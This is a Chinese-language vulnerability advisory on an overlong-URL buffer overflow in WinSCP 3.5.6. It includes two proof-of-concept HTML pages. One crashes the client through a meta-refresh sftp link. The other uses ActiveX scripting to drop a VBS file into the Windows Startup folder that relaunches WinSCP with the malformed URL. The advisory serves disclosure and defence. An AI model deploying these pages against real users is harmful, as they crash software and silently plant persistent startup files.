安全研究

安全漏洞
WinSCP超长URL处理内存破坏漏洞

发布日期:2004-04-16
更新日期:2004-04-22

受影响系统:
Martin Prikryl WinSCP 3.5.6
描述:
BUGTRAQ  ID: 10160

WinSCP是一款开放源代码使用SSH的SFTP和SCP客户端。

WinSCP在处理包含超长字符串的'sftp:'或'scp'地址时缺少充分边界检查,远程攻击者可以利用这个漏洞建立恶意链接,诱使WinSCP处理,可触发缓冲区溢出。

默认WinSCP为用户提供对 sftp:// 和 scp:// 地址的处理,由于应用程序对超长URL缺少正确边界缓冲区检查,如果HTML页面中包含畸形地址,并诱使用户访问,可导致程序崩溃,精心构建链接数据,可能以进程权限在系统上执行任意指令。

<*来源:Luca Ercoli (luca.ercoli@inwind.it
  
  链接:http://www.securiteam.com/windowsntfocus/5OP0A1FCLE.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Luca Ercoli (luca.ercoli@inwind.it)提供了如下测试方法:

------ WinSCP_DoS1.html --------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</HEAD>
<BODY>
</BODY>
</HTML>

-------- WinSCP_DoS2.html -------

<html>
  <head>
   <title>WinSCP DoS</title>

<script language="JScript">

     var WshShell = new ActiveXObject("WScript.Shell");
     strSU = WshShell.SpecialFolders("StartUp");

     var fso = new ActiveXObject("Scripting.FileSystemObject");
     var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

     vibas.WriteLine("Dim shell");
     vibas.WriteLine("Dim quote");
     vibas.WriteLine("Dim DoS");
     vibas.WriteLine("Dim param");
     vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
     vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
     vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
     vibas.WriteLine("quote = Chr(34)");
     vibas.WriteLine("pgm = \"explorer\"");
     vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

     vibas.Close();

    </script>

  </head>
</html>

建议:
厂商补丁:

Martin Prikryl
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://winscp.sourceforge.net/

浏览次数:3302
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障